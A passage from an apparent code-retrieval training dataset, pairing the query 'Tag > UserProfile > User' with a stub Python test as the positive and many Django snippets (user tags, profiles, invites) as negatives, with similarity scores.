remaining.copy()\n for m in remaining:\n if loaded.issuperset({r for r in m.requirements.keys()}):\n new_remaining.remove(m)\n loaded.add(m.name)\n self.module_call_order.append(m)\n if len(new_remaining) < len(remaining):\n # this is good.. we made progress!\n remaining = new_remaining\n if not remaining:\n # hooray! No more plugins to process\n break\n else:\n # this is bad. we are not making progress.\n raise Exception(\"dependency load order is not progressing!\")", "def _relation_check(self):\n seen = set()\n for entity in self.get_entities():\n for field in entity.fields.itervalues():\n if field.is_relation():\n seen.add(field.remote_name)\n missing = seen - set(self.entities.keys())\n if missing:\n raise exceptions.SchemaError(\n 'undefined entities referenced in relations: %s' % (\n ', '.join(missing)))", "def test_content_categories(app_audited, redisdb_targeting, redisdb_profiles):\n content_categories = ContentCategory.objects.all()\n\n for strategy in Strategy.objects.all():\n strategy.content_category_values = content_categories\n trigger_cache_mappings()\n\n check_target_values(redisdb_targeting, content_categories)\n\n for strategy in Strategy.objects.all():\n strategy.content_category_values.clear()\n strategy.content_category_values_exclude = content_categories\n trigger_cache_mappings()\n\n check_target_values(redisdb_targeting, content_categories, include=False)", "def test_get_virtual_account_beneficiaries(self):\n pass", "def get_is_por_holder(self, obj):\n user = self.context['request'].user\n if not user.is_authenticated:\n return False\n # pylint: disable=no-member\n profile = UserProfile.objects.get(user=user)\n\n if profile == obj.club.secy:\n return True\n\n if profile in obj.club.joint_secy.all():\n return True\n\n if profile == obj.club.council.gensec:\n return True\n\n if profile in obj.club.council.joint_gensec.all():\n return True\n\n return False", "def setup_eager_loading(queryset):\n queryset = queryset.select_related('user')\n return queryset", "def do_get_invites_controlled_by_user(user_profile: UserProfile) -> List[Dict[str, Any]]:\n if user_profile.is_realm_admin:\n prereg_users = filter_to_valid_prereg_users(\n PreregistrationUser.objects.filter(referred_by__realm=user_profile.realm)\n )\n else:\n prereg_users = filter_to_valid_prereg_users(\n PreregistrationUser.objects.filter(referred_by=user_profile)\n )\n\n invites = []\n\n for invitee in prereg_users:\n assert invitee.referred_by is not None\n invites.append(\n dict(\n email=invitee.email,\n 
invited_by_user_id=invitee.referred_by.id,\n invited=datetime_to_timestamp(invitee.invited_at),\n expiry_date=get_invitation_expiry_date(invitee.confirmation.get()),\n id=invitee.id,\n invited_as=invitee.invited_as,\n is_multiuse=False,\n )\n )\n\n if not user_profile.is_realm_admin:\n # We do not return multiuse invites to non-admin users.\n return invites\n\n multiuse_confirmation_objs = Confirmation.objects.filter(\n realm=user_profile.realm, type=Confirmation.MULTIUSE_INVITE\n ).filter(Q(expiry_date__gte=timezone_now()) | Q(expiry_date=None))\n for confirmation_obj in multiuse_confirmation_objs:\n invite = confirmation_obj.content_object\n assert invite is not None\n\n # This should be impossible, because revoking a multiuse invite\n # deletes the Confirmation object, so it couldn't have been fetched above.\n assert invite.status != confirmation_settings.STATUS_REVOKED\n invites.append(\n dict(\n invited_by_user_id=invite.referred_by.id,\n invited=datetime_to_timestamp(confirmation_obj.date_sent),\n expiry_date=get_invitation_expiry_date(confirmation_obj),\n id=invite.id,\n link_url=confirmation_url(\n confirmation_obj.confirmation_key,\n user_profile.realm,\n Confirmation.MULTIUSE_INVITE,\n ),\n invited_as=invite.invited_as,\n is_multiuse=True,\n )\n )\n return invites", "def filter_queryset(self, request, queryset, view):\n user = request.user\n project_id = view.kwargs.get(view.lookup_field)\n\n if user.is_anonymous:\n return queryset.filter(Q(shared=True))\n\n if project_id:\n int_or_parse_error(\n project_id,\n \"Invalid value for project_id. It must be a positive integer.\",\n )\n\n # check if project is public and return it\n try:\n project = queryset.get(id=project_id)\n except ObjectDoesNotExist as non_existent_object:\n raise Http404 from non_existent_object\n\n if project.shared:\n return queryset.filter(Q(id=project_id))\n\n return super().filter_queryset(request, queryset, view)", "def test_itar_restrict_asset(self):\n pass", "def pkg_ifcs_requires(me, pkg, ifcs):\n un = set()\n for i in ifcs:\n if (pkg,i) in me._pkg_ifc_reqs:\n un.update(me._pkg_ifc_reqs[pkg,i])\n return un", "def all_versions_where(self, pred):\n for v in self.versions:\n if pred(v['id'], v['name']):\n yield self.get_version(v['id'])", "def _target_filter(self, obj):\r\n return type(obj).__name__ in ['Cube'] and not obj.is_grasped # List because may be extended to other objects.\r" ]
[ "0.55593485", "0.5515848", "0.548871", "0.53242356", "0.5323796", "0.5270651", "0.52381533", "0.5179091", "0.51565045", "0.5153947", "0.50942135", "0.50636023", "0.4970877", "0.4866266", "0.48630893", "0.48102677", "0.47713712", "0.47691986", "0.47338426", "0.4730474", "0.4702195", "0.47008726", "0.46833804", "0.46815392", "0.4666007", "0.46590638", "0.4625202", "0.46190557", "0.46127832", "0.46127832", "0.4609541", "0.46059498", "0.45987454", "0.45979112", "0.45924667", "0.45912224", "0.4582612", "0.45657712", "0.45610318", "0.45581374", "0.4553742", "0.45527327", "0.45492738", "0.4542811", "0.45366198", "0.45280686", "0.45186174", "0.45136544", "0.45094258", "0.45083708", "0.4496403", "0.4493632", "0.44905284", "0.44901785", "0.44868082", "0.44840652", "0.44813874", "0.44783768", "0.44776374", "0.4467233", "0.44669032", "0.44599292", "0.44579914", "0.44579914", "0.44554007", "0.44545078", "0.44534048", "0.44521546", "0.4443146", "0.4442461", "0.443463", "0.4427735", "0.44235682", "0.44215435", "0.44191915", "0.4416336", "0.4414955", "0.44137552", "0.44065812", "0.4406019", "0.44059226", "0.44050792", "0.44048208", "0.43981335", "0.43876404", "0.43873605", "0.43872887", "0.43865997", "0.43846062", "0.43844426", "0.43842387", "0.43798855", "0.43784904", "0.43769467", "0.43740857", "0.43727347", "0.43726397", "0.43674228", "0.4359809", "0.435853" ]
0.6230097
0
Tag > UserProfile > User
def test_twice_dependent_object_import(self): pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def tags(request):\n return Tag.objects.filter(user=request.user)", "def test_tags_limited_to_user_tags(self):\n\n user2 = create_user(\n fname='Test2',\n lname='User2',\n email='[email protected]',\n password='testpass2'\n )\n\n Tag.objects.create(user=user2, name='Vegan')\n tag = Tag.objects.create(user=self.user, name='Dessert')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def user_view(cls, user, profile):\r\n pass", "def describe_my_user_profile():\n pass", "def test_tags_limited_to_user(self):\n user2 = get_user_model().objects.create_user(\n 'Other User', '[email protected]', 'otherpassword')\n Tag.objects.create(user=user2, name='Nonveg')\n tag = Tag.objects.create(user=self.user, name='Fruity')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def user_view(cls, user, profile):\n pass", "def test_tags_limited_to_user(self):\n user2 = get_user_model().objects.create_user(\n '[email protected]',\n 'testpass'\n )\n Tag.objects.create(user=user2, name='Fruity')\n tag = Tag.objects.create(user=self.user, name='Comfort Food')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def test_tags_limited_to_user(self):\n imposter = get_user_model().objects.create_user(\n email='[email protected]', password='im_an_imposter')\n Tag.objects.create(user=imposter, name='BAD_FOOD')\n tag = Tag.objects.create(user=self.user, name='fruit')\n res = self.client.get(TAG_URL)\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "async def slashtag_user(\n self,\n ctx: commands.Context,\n tag_name: TagName(check_global=False, check_regex=False),\n *,\n tagscript: TagScriptConverter,\n ):\n await self.create_slash_tag(\n ctx, tag_name, tagscript, is_global=False, command_type=ApplicationCommandType.USER\n )", "def test_tags_limited_to_user(self):\n user2 = create_user('[email protected]', 'OtherPassword')\n Tag.objects.create(user=user2, name='Fruity')\n tag = Tag.objects.create(user=self.user, name='Home Food')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def test_tags_limited_to_user(self):\n user2 = get_user_model().objects.create_user(\n '[email protected]',\n '123456'\n )\n Tag.objects.create(user=user2, name='Fruity')\n tag = Tag.objects.create(user=self.user, name='Comfort Food')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def user(self, uid):", "def get_usernames_from_tag(tag):\n try:\n tag_url = 'https://www.instagram.com/explore/tags/{0}/?__a=1'.format(tag)\n tag_res = requests.get(tag_url).json()\n\n nodes = tag_res['tag']['media']['nodes']\n\n new_urls = [node['code'] for node in nodes]\n new_req = [requests.get('https://www.instagram.com/p/{0}/?__a=1'.format(url)).json() for url in new_urls]\n\n usernames = [req['graphql']['shortcode_media']['owner']['username'] for req in new_req]\n\n return usernames\n\n except Exception as 
err:\n print('{0} - This account was not classified...'.format(str(err)))\n return []", "def profile(request):\n profile = request.user.profile\n return render(request, 'accounts/profile.html', {'profile': profile})", "def user(self):", "def user(request):\n\tprofile = {}\n\tif (request.user.is_authenticated()==True) and(request.user is not None):\n\t\tprofile = UserProfile.objects.get(user_id=request.user)\n\treturn {\n\t\t'user': request.user,\n\t\t'profile':profile\n\t}", "def test_tags_limited_to_user(self):\n user2 = User.objects.create(\n email='[email protected]',\n password='test_password'\n )\n Tag.objects.create(user=user2, name='Fruity')\n Tag.objects.create(user=self.user, name='Comfort Food')\n\n res = self.client.get(TAGS_URL)\n\n tags = Tag.objects.filter(user=self.user).order_by('-name')\n serializer = TagSerializer(tags, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data, serializer.data)", "def sample_tag(user,name=\"Main Course\"):\n return Tag.objects.create(user=user,name=name)", "def makeProfile(request):\n upr = UserProfile()\n upr.user = request.user\n upr.image = \"images/no-pic.png\"\n upr.save()", "def sample_tag(user,name='main-coures'):\n return Tag.objects.create(user=user, name=name)", "def get_tags(x):\n poster = x['_source']['user']['id']\n for user in x['_source']['users_in_photo']:\n if user['user']['id'] != poster:\n yield (poster, user['user']['id'])", "def user_profile(request):\n user = User.objects.get(email=request.user.email)\n bugs = Bug.objects.filter(author=request.user.id)\n features = Feature.objects.filter(author=request.user.id)\n context = { \n 'bugs' : bugs, \n 'features' : features,\n 'profile' : user,\n }\n \n return render(request, 'profile.html', context)", "def by_user(user):\n return Tag.objects.all().filter(owner=user)", "def user(request, user_id):\n raise NotImplementedError", "def __str__(self):\n return self.user.username + \"'s Profile\"", "def user_profile(request, slug):\n posts = Post.objects.filter(author__username=slug)\n\n following = request.user.profile.followers.filter(username=slug)\n return render(request,\n 'posts/profile.html',\n {'posts': posts,\n 'author': User.objects.get(username=slug),\n 'following': following})", "def sample_tag(user, name='Main course'):\n return Tag.objects.create(user=user, name=name)", "def sample_tag(user, name='Main course'):\n return Tag.objects.create(user=user, name=name)", "def test_tags_limited_to_user(self):\n\n user2 = get_user_model().objects.create_user(\n email='[email protected]',\n password='23pass1234&'\n )\n\n Tag.objects.create(user=self.user, name='Vegan')\n Tag.objects.create(user=self.user, name='Dessert')\n Tag.objects.create(user=user2, name='Valami mas')\n\n res = self.client.get(TAGS_URL)\n\n tags = Tag.objects.filter(user=self.user).order_by('-name')\n serializer = TagSerializer(tags, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), len(tags))\n self.assertEqual(res.data, serializer.data)", "def test_tags_limited_to_authenticated_user(self):\n\n # Create a new user in addition to the user created in\n # the setUp, and leave it without an authentication.\n credentials = {'email': '[email protected]', 'password': 'Testpass34'}\n new_user = get_user_model().objects.create_user(**credentials)\n\n # Create a tag that is assigned to the new user.\n Tag.objects.create(user=new_user, name='Fruity')\n\n # Create a tag that is assigned to 
the authenticated user.\n tag = Tag.objects.create(user=self.user, name='Comfort Food')\n\n response = self.client.get(URL_TAGS)\n\n # Check that the response is HTTP 200, and includes only one tag.\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.data), 1)\n\n # Check that the name of the returned tag matches with the\n # name of the tag that was assigned to the authenticated user.\n self.assertEqual(response.data[0]['name'], tag.name)", "def profile(request):\n user = Info.objects.all()\n return render(request, 'kvent/profile.html',{user:'user'})", "def getUserProfile(request):\n user = request.user\n serializer = UserSerializer(user, many=False)\n return Response(serializer.data)", "def sample_tags(user, name='Main cuisine'):\n return Tag.objects.create(user=user, name=name)", "def profile(request):\n auth, created = AuthProfile.objects.get_or_create(user=request.user)\n if not request.user.is_authenticated():\n raise Exception(\"Not Logged in\")\n\n token, created = Token.objects.get_or_create(user=request.user)\n context = {}\n context['TOKEN'] = token.key\n\n return context", "def user(self):\n pass", "def manage_user_profile(sender, instance, created, **kwargs):\n if created:\n Profile.objects.create(user=instance)\n else:\n instance.profile.save()", "def get_context_data(self, **kwargs):\n user = ImagerProfile.objects.get(user__username=self.request.user.username)\n # import pdb;\n context = super(ProfileView, self).get_context_data(**kwargs)\n photos = self.request.user.photos.all()\n ph_public = len(photos.filter(published=\"Public\"))\n ph_private = len(photos.filter(published=\"Private\"))\n albums = self.request.user.albums.all()\n al_public = len(albums.filter(published=\"Public\"))\n al_private = len(albums.filter(published=\"Private\"))\n context = {'user': user, 'ph_public': ph_public, 'ph_private': ph_private,\n 'al_public': al_public, 'al_private': al_private}\n return context", "async def mytags(ctx):\n if ctx.message.channel.name.lower() not in bot_channels:\n return\n display = ctx.message.author.display_name\n display_tags = []\n if not user_tags.get(ctx.message.author.name, None):\n return\n for tag_key, tag_count in user_tags[ctx.message.author.name]['tags'].items():\n display_tags.append(\"{0} ({1})\".format(tag_key, tag_count))\n await amor_manager.say(\"{0}'s tag usage: \\n ```{1}```\".format(display, \"\\n\".join(display_tags)))", "def tags():", "def view_friends(request, username):\n user = get_object_or_404(user_model, username=username)\n qs = Friend.objects.select_related(\"UserProfile\").filter(to_user=user)\n friends = [u.from_user for u in qs]\n self = navbar(request.user.id)\n user1 = self.user.id\n for i in friends:\n to_user = i.id\n i.user2 = str(user1)+\"|\"+str(to_user)\n return render_to_response( 'view_friends.html', {'friends': friends, 'self':self})", "def on_user_create(self, user):", "def view_user(request, userid):\n user_to_view = User.objects.get(id=userid)\n profile = Profile.objects.get(user=user_to_view)\n dogs = Dog.objects.all().filter(owner=user_to_view)\n\n return render(request, 'woofer/view_user.html',\n {\n 'profile' : profile,\n 'dogs' : dogs\n })", "def _profile(user):\n profile = UserProfile()\n profile.user_id = user.id\n profile.save()", "def sample_tag(user, name='Service Tag'):\n return Tag.objects.create(user=user, name=name)", "def make_profile_for_user(sender, instance, **kwargs):\n if kwargs['created']:\n new_profile = ImagerProfile(user=instance)\n new_profile.save()", "def 
sample_tag(user, name='sample tag'):\n return Tag.objects.create(user=user, name=name)", "def save_user_profile(sender, instance, **kwargs):\n instance.profile.save()", "def save_user_profile(sender, instance, **kwargs):\n instance.profile.save()", "def userProfile(userid):\n images = get_uploaded_images()\n record = UserProfile.query.filter_by(id=userid).first()\n return render_template('userProfile.html', images=images, record =record)", "def create_sample_tag(user, name=\"spicy\"):\n return Tag.objects.create(custom_user=user, name=name)", "def profile(username):\n try:\n user = mongo.db.users.find_one({\"username\": username})\n terms = list(mongo.db.terms.find(\n {\"submitted_by\": user[\"_id\"], \"rating\": {\"$gt\": -2}}))\n ordered = sortTermsAlphabetically(terms)\n toprated = sortTermsByRating(terms)\n games = list(mongo.db.games.find())\n return render_template(\n \"profile.html\", user=user, terms=ordered,\n toprated=toprated, games=games)\n except TypeError:\n flash(\"This user does not exist\", category=\"error\")\n return redirect(url_for(\"get_terms\"))", "def user_profile(request, id):\n user = User.objects.get(id=id)\n\n return render(request, \"core/profile.html\",{\n \"user\": user,\n \"range\": range(user.stars),\n \"bids_placed\": BuyProduct.objects.filter(\n customer = user\n )\n })", "def create_profile(sender, instance, created, **kwargs):\n if created: \n profile, new = UserProfile.objects.get_or_create(user=instance)", "def save_user_profile(instance, **_):\n instance.profile.save()", "def view_user(user):\n return {\n \"id\": user.id,\n \"first_name\": user.first_name,\n \"last_name\": user.last_name,\n \"email\": user.email,\n \"profile_pic\": user.profile_pic,\n }", "def createUserProfile(user):\n MyProfile.objects.get_or_create(user=user)", "def test_profile_associated_with_users(self):\n profile = ImagerProfile.objects.first()\n self.assertTrue(hasattr(profile, 'user'))\n self.assertIsInstance(profile.user, User)", "def profile_detail(request, pk):\n profile = request.user.userprofile\n user_relationships = profile.get_relationships()\n user_request = profile.get_friend_request()\n\n context = {\n # 'user': user,\n 'profile': profile,\n 'user_relationships': user_relationships,\n 'user_request': user_request\n }\n\n return render(request, 'accounts/profile_detail.html', context)", "def create_profile(sender, **kwargs):\n user = kwargs[\"instance\"]\n if kwargs[\"created\"]:\n user_profile = Profile(user=user)\n user_profile.save()", "def __str__(self):\n return f\"Profile for user {self.user}\"", "def sample_tag(user, name = 'Main Course'): # no need to use **params here since we have only 2 arguments\n return Tag.objects.create(user=user, name=name)", "def profile(request, id):\n u = get_object_or_404(User, pk=id)\n context = ProfileContext(u).get_context()\n return render(request, 'wantedly_app/profile.html', context)", "def show_user_profile(username):\n\n name = USERS[username]\n return f\"<h1>Profile for {name}</h1>\"", "def profile():\n recipes = mongo.db.recipes.find({\"created_by\": session[\"user\"]})\n return render_template(\"accounts/profile.html\", recipes=recipes)", "def view_profile():\n user_id = session.get(\"user_id\")\n \n user = User.query.get(session[\"user_id\"])\n \n return render_template(\"editable_profile_page.html\", user=user)", "def create_profile(sender, **kw):\n user = kw['instance']\n if kw['created']:\n profile = UserProfile(user=user)\n profile.save()", "def get_tagged_user(line, unique_users):\n tagged_user = None\n\n for 
user in unique_users:\n \n tagged_user = re.search(f\"@{user}\\s*\", line)\n \n if tagged_user != None:\n tagged_user = tagged_user.group(0).replace(\"@\", \"\").strip()\n line = line.replace(f\"@{user} \", \"\")\n break\n \n return (tagged_user, line)", "def user_detail(request, slug):\n user = request.user\n profile = Profile.objects.get(slug=slug)\n albums = profile.albums.all()\n plc_albums = albums.exclude(is_public=False)\n pvt_albums = albums.exclude(is_public=True)\n\n friends = profile.friends.all()\n family = profile.relations.all()\n user_family = user.profile.relations.all()\n user_friends = user.profile.friends.all()\n\n receiver = FriendRequest.objects.filter(from_user=profile.user)\n sender = FriendRequest.objects.filter(to_user=profile.user)\n \n received = []\n sent = []\n for item in receiver:\n received.append(item.id)\n received.append(item.to_user)\n\n for item in sender:\n received.append(item.id)\n sent.append(item.from_user)\n\n template = 'profiles/user_detail.html'\n context = {\n 'profile': profile,\n 'friends': friends,\n 'family': family,\n 'albums': albums,\n 'plc_albums': plc_albums,\n 'pvt_albums': pvt_albums,\n 'received': received,\n 'sent': sent,\n 'user_family': user_family,\n 'user_friends': user_friends,\n }\n return render(request, template, context)", "def user_profile(request, pk=None):\n # user is indentified by his email\n user = User.objects.get(email=request.user.email)\n # show profileposts, fist identifying the user and then ordering by date, new first\n profileposts = ProfilePost.objects.filter(user=request.user).filter(published_date__lte=timezone.now()\n ).order_by('-published_date').all()\n # show messages to user, ordering by date, new first. In template an if statement makes sure only the messages of the logged-in user show\n contactuserposts = ContactUser.objects.all().filter(date__lte=timezone.now()\n ).order_by('-date').all() \n return render(request, 'profile.html', {\"profile\": user, 'profileposts': profileposts, 'contactuserposts': contactuserposts})", "def projects_with_tag(request, tag):\n return tag.project_set.filter(user=request.user)", "def create_user_profile(sender, **kwargs):\n\n if kwargs['created']:\n UserProfile.objects.create(user=kwargs['instance'])", "def profile(username):\n username = mongo.db.users.find_one(\n {\"username\": session[\"user\"]})[\"username\"]\n\n tips = list(mongo.db.tips.find())\n return render_template(\"profile.html\", tips=tips)\n\n if session[\"user\"]:\n return render_template(\"profile.html\", username=username)\n\n return redirect(url_for(\"login\"))", "def extract_user_short(data):\n user_pk = data.get(\"id\", data.get(\"pk\"))\n assert user_pk, 'User without pk \"%s\"' % data\n return {\n \"pk\": int(user_pk),\n \"username\": data[\"username\"],\n \"full_name\": data[\"full_name\"],\n \"is_private\": data.get(\"is_private\"),\n \"profile_pic_url\": data[\"profile_pic_url\"],\n \"is_verified\": data.get(\"is_verified\"),\n # \"is_unpublished\": data.get(\"is_unpublished\"),\n }", "def profile_for(email):\n return OrderedDict([(b'email', email), (b'uid', b'10'), (b'role', b'user')])", "def profile(request, username):\n # Get profile information for a user. 
Use iexact for case-insensitive query\n try:\n profile = User.objects.get(username__iexact=username)\n except ObjectDoesNotExist:\n profile = None\n return render(request, \"network/profile.html\", {\"profile\": profile})\n\n # Find all users following the user whose profile being visited\n followers = User.objects.filter(following=profile.id)\n\n # Get posts for users and put in paginator format\n posts = Post.objects.filter(author=profile).order_by('-timestamp')\n paginator = Paginator(posts, 10)\n\n page_number = request.GET.get('page')\n page_object = paginator.get_page(page_number)\n\n return render(request, \"network/profile.html\", {\n \"profile\": profile, \"followers\": followers, \"posts\": page_object\n })", "def userView(request):\n context = {\n \"user\": request.user,\n }\n return render(request, 'blog/user.html', context)", "def user():", "def save_user_receiver(sender, instance, created, *args, **kwargs):\n print(\"profile created\", instance)\n if created:\n new_profile = UserProfile.objects.get_or_create(owner=instance)", "def getInterestedUsers():", "def view_profile(request, userid=None):\n # Show the currently logged in user's profile if none is specified\n if userid is None:\n user = request.user\n else:\n user = User.objects.get(id=userid)\n profile = Profile.objects.get(user=user)\n dogs = Dog.objects.all().filter(owner=user)\n\n return render(request, 'woofer/view_profile.html',\n {\n 'profile' : profile,\n 'dogs' : dogs\n })", "def test_tag_is_in_the_template(self):\n\n template = Template(\n '{% load profile_admin_editing %}{% edit_link profile %}')\n\n context = Context({'profile': self.profile})\n\n self.assertEqual(self.super_link, template.render(context))", "def getUserCounts(tag, lastNesting=False):\n # Sprawdz czy bez lastNesting (jeszcze bool w wywol fun. 
w collectDatebase) jest szybciej.\n uc, tagDict = {}, {}\n # Petla po wszystkich wejsciach\n for p1 in pydelicious.get_tagposts(tag):\n user = p1['user']\n if user:\n uc.setdefault(user, 0)\n uc[user] += 1\n # tagDict = {tagDict.setdefault(p2['tags'].replace (' ', '_'), 1) for p2 in pydelicious.get_userposts(p1['user']) if p2['tags']}\n if lastNesting:\n break\n for p2 in pydelicious.get_userposts(p1['user']):\n if p2['tags']:\n tagDict.setdefault(p2['tags'].replace(' ', '_'), 1)\n return (user, uc), tagDict", "def profile(request, user_name=None):\n \n # get the viewed user\n if user_name is None:\n user = request.user.get_profile()\n else:\n user = get_object_or_404(User, username=user_name)\n user = user.get_profile()\n \n # set display name\n if len(user.user.first_name) <= 0:\n user.display_name = user.user.username\n else:\n user.display_name = user.user.first_name + \" \" + user.user.last_name\n \n # set avatar path\n if len(user.avatar.name) <= 0:\n user.avatar_url = settings.MEDIA_URL + \"avatar/noavatar.png\"\n else:\n user.avatar_url = user.avatar.url\n \n # get tracked list, ownedlist and playlist\n trackedlist = user.trackedrecordlist_set.all()\n ownedlist = user.userentry_set.all()\n playlist = user.playlist_set.all()\n context = {\n 'profile_user': user,\n 'trackedlist': trackedlist,\n 'ownedlist': ownedlist,\n 'playlist': playlist\n }\n return render_to_response(\n 'usermgr/profile.html',\n context,\n context_instance = RequestContext(request))", "def author_profile(request, pk):\n author = get_object_or_404(User, pk=pk)\n profileposts = ProfilePost.objects.filter(user=author).filter(published_date__lte=timezone.now()\n ).order_by('-published_date').all()\n return render(request, 'profile.html', {\"profile\": author, 'profileposts': profileposts})", "def tag_list(request):\r\n rdict = request.matchdict\r\n username = rdict.get(\"username\", None)\r\n if username:\r\n username = username.lower()\r\n\r\n tags_found = TagMgr.find(username=username)\r\n\r\n return {\r\n 'tag_list': tags_found,\r\n 'tag_count': len(tags_found),\r\n 'username': username,\r\n }", "def add_profile_photo():\n pass", "def user_profile_page(request, pk=None):\n userprofile = get_object_or_404(User, pk=pk)\n profileposts = ProfilePost.objects.filter(user=userprofile).filter(published_date__lte=timezone.now()\n ).order_by('-published_date').all() \n return render(request, 'profile.html', {\"profile\": userprofile, 'profileposts': profileposts})", "def create_profile(sender, instance, created, **kwargs):\n if created:\n profile, created = UserProfile.objects.get_or_create(user=instance)", "def profile(request):\n return render(request, 'profile.html', context)", "def renderProfile(request, user, identities):\n sourcesResults = lifestream.models.Feed.objects.order_by('url').filter(user__username=user.username)\n sources = []\n for s in sourcesResults:\n if s.title:\n sources.append({'title': s.title, 'url': s.url})\n \n # avatar\n \n gravatarHash = hashlib.md5(user.email).hexdigest()\n avatar_url = \"http://www.gravatar.com/avatar/%s.jpg?d=monsterid&s=80\" % gravatarHash\n \n t = django.template.loader.select_template(('foo', 'lifestream/profile_blurb.html'))\n c = django.template.Context(\n {'avatar_src': avatar_url, 'avatar_width':'80', 'avatar_height':'80',\n 'user': user,\n 'username': user.username,\n 'preferences': json.loads(user.get_profile().properties),\n 'sources': sources,\n 'identities': identities})\n return t.render(c)", "def getdat(user):\r\n profile = user.profile\r\n return 
[user.username, user.email] + [getattr(profile, xkey, '') for xkey in profkeys]", "def perform_create(self, serializer): # this method runs everytime a POST method is called\n serializer.save(user_profile=self.request.user)", "def get_one_user():", "def tagger():", "def public_profile(request, username):\n if User.objects.filter(username__iexact=username, is_active=True).exists():\n public_user = User.objects.get(username__iexact=username)\n public_email = public_user.associated_emails.filter(is_public=True).first()\n else:\n raise Http404()\n\n # get list of projects\n projects = PublishedProject.objects.filter(authors__user=public_user).order_by('-publish_datetime')\n\n\n return render(request, 'user/public_profile.html', {\n 'public_user':public_user, 'profile':public_user.profile,\n 'public_email':public_email, 'projects':projects})", "def user_post_save(sender, instance, created, **kwargs):\n\t\tif created == True:\n\t\t\tup = UserProfile()\n\t\t\tup.user = instance\n\t\t\tup.save()", "def get_user_profile(self):\n return self.request('get', 'id/users')", "def image_thumb_tag(self):\n u = self.user\n uf = self.app.url_for\n image = None\n if u.image is not None and u.image!=\"\":\n try:\n image = uf(\"asset\", asset_id = self.app.module_map.uploader.get(u.image).variants['userlist']._id)\n except AssetNotFound:\n pass\n except KeyError:\n pass\n if image is not None:\n return \"\"\"<img alt=\"%s\" class=\"profile-image-userlist\" src=\"%s\">\"\"\" %(u.fullname, image)\n return \"\"\"<div class=\"profile-image-userlist missing\"><i class=\"fa fa-user\"></i></div>\"\"\"", "def get_context_data(self, **kwargs):\n username = self.kwargs.get('username', None)\n if username:\n user = get_object_or_404(User, username=username)\n try:\n profile = user.get_profile()\n except Profile.DoesNotExist:\n raise Http404\n context_data = super(PhotosListView, self).get_context_data(**kwargs)\n context_data['profile'] = profile\n return context_data\n\n return super(PhotosListView, self).get_context_data(**kwargs)", "def get_profile(user_id):\n return User.objects.select_related('userprofile', 'userstatistics') \\\n .get(pk=user_id)", "def create_user_profile(sender, instance, created, **kwargs):\n if created:\n user_profile = UserProfile.objects.create(user=instance)" ]
[ "0.6036632", "0.59151506", "0.5854669", "0.5790308", "0.5763715", "0.574283", "0.5727083", "0.57143545", "0.57116055", "0.56976116", "0.5677059", "0.5661893", "0.56557196", "0.56339324", "0.5570487", "0.5566566", "0.5553686", "0.5552441", "0.55499566", "0.5542527", "0.5512405", "0.5504821", "0.54956746", "0.5484684", "0.542978", "0.54278225", "0.5427484", "0.5427484", "0.5407592", "0.5376521", "0.53692675", "0.53495944", "0.5341351", "0.53324896", "0.52820903", "0.5276733", "0.52762914", "0.52740175", "0.52638125", "0.5261291", "0.52530897", "0.52502257", "0.5233098", "0.521106", "0.52014023", "0.5192947", "0.51896083", "0.51896083", "0.5186795", "0.51815104", "0.5179892", "0.5177855", "0.5152058", "0.51517266", "0.51491225", "0.51446295", "0.514165", "0.5133557", "0.51105326", "0.51033485", "0.50978976", "0.5096247", "0.5089292", "0.5073722", "0.5070082", "0.50506836", "0.50493187", "0.5043407", "0.50425094", "0.5039894", "0.5037675", "0.50311464", "0.5031005", "0.5025469", "0.50250334", "0.50121886", "0.500064", "0.49964982", "0.49951017", "0.49924913", "0.4987323", "0.4972659", "0.4971254", "0.49682057", "0.49681073", "0.49667114", "0.49654046", "0.49644175", "0.49590638", "0.4950115", "0.49469864", "0.4942378", "0.4938487", "0.4936969", "0.4933872", "0.49323708", "0.49317524", "0.49303073", "0.49291107", "0.4924284", "0.49241185" ]
0.0
-1
Tag > UserProfile > User
def test_partial_twice_dependent_object_import(self): pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def tags(request):\n return Tag.objects.filter(user=request.user)", "def test_tags_limited_to_user_tags(self):\n\n user2 = create_user(\n fname='Test2',\n lname='User2',\n email='[email protected]',\n password='testpass2'\n )\n\n Tag.objects.create(user=user2, name='Vegan')\n tag = Tag.objects.create(user=self.user, name='Dessert')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def user_view(cls, user, profile):\r\n pass", "def describe_my_user_profile():\n pass", "def test_tags_limited_to_user(self):\n user2 = get_user_model().objects.create_user(\n 'Other User', '[email protected]', 'otherpassword')\n Tag.objects.create(user=user2, name='Nonveg')\n tag = Tag.objects.create(user=self.user, name='Fruity')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def user_view(cls, user, profile):\n pass", "def test_tags_limited_to_user(self):\n user2 = get_user_model().objects.create_user(\n '[email protected]',\n 'testpass'\n )\n Tag.objects.create(user=user2, 